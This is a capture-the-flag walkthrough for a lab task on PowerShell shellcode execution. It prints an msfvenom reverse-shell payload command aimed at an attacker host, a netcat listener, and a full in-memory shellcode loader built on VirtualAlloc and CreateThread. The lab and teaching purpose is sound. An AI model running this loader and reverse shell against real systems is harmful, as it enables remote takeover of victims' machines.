Note:

Hey! Before you go through this writeup try the task first by your self and if you get stuck come back and checkout the writeup.

PowerShell is a powerful task automation and configuration management tool, and when combined with malicious intent, it can be a double-edged sword. Today, we explore shellcode execution through PowerShell and the importance of securing your scripts.

Shellcode, typically a piece of machine code, is used to execute a payload on a compromised system. Understanding its creation and secure handling helps defenders anticipate and thwart potential attacks.

Q: What is the flag value once Glitch gets reverse shell on the digital

vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt.

A: The pre challenge instructions gives us a idea on how to get the flag. The flag requires us to connect over port 4444 using a shell. To connect we need to modify the msfvenom payload.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<AttackBox_IP> LPORT=4444 -f powershell

Following the challenge instruction we can set up a netcat listener on our attack box on port 4444

nc -lnvp 4444 

To create a reverse shell,

1. In the Attack Box open a Powershell window and copy past the following and hit Enter.

$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;

public class VrtAlloc{
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);  
}
"@

Add-Type $VrtAlloc 

$WaitFor= @"
using System;
using System.Runtime.InteropServices;

public class WaitFor{
 [DllImport("kernel32.dll", SetLastError=true)]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);   
}
"@

Add-Type $WaitFor

$CrtThread= @"
using System;
using System.Runtime.InteropServices;

public class CrtThread{
 [DllImport("kernel32", CharSet=CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
  
}
"@
Add-Type $CrtThread

2. Copy paste the payload that you get from the msfvenom command next and hit enter.
3. Copy paste this command and hit enter

[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)

4. Copy paste this command and hit enter

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)

5. Copy paste this command and hit enter

$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)

6. Copy paste this command and hit enter

[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

If your PowerShell window closes unexpectedly, it means that the reverse shell wasn’t able to connect to the listener. Check your IP and Port and make sure that the listener is running on the Attacker Box.

7. Once connected, navigate to the flag's directory

cd C:\Users\glitch\Desktop

8. View the flag's contents (may take up to a minute to appear)

type flag.txt

Q: Are you interested in learning more about evasion? Take a look at the AV Evasion: Shellcode room.

A: No Answer needed!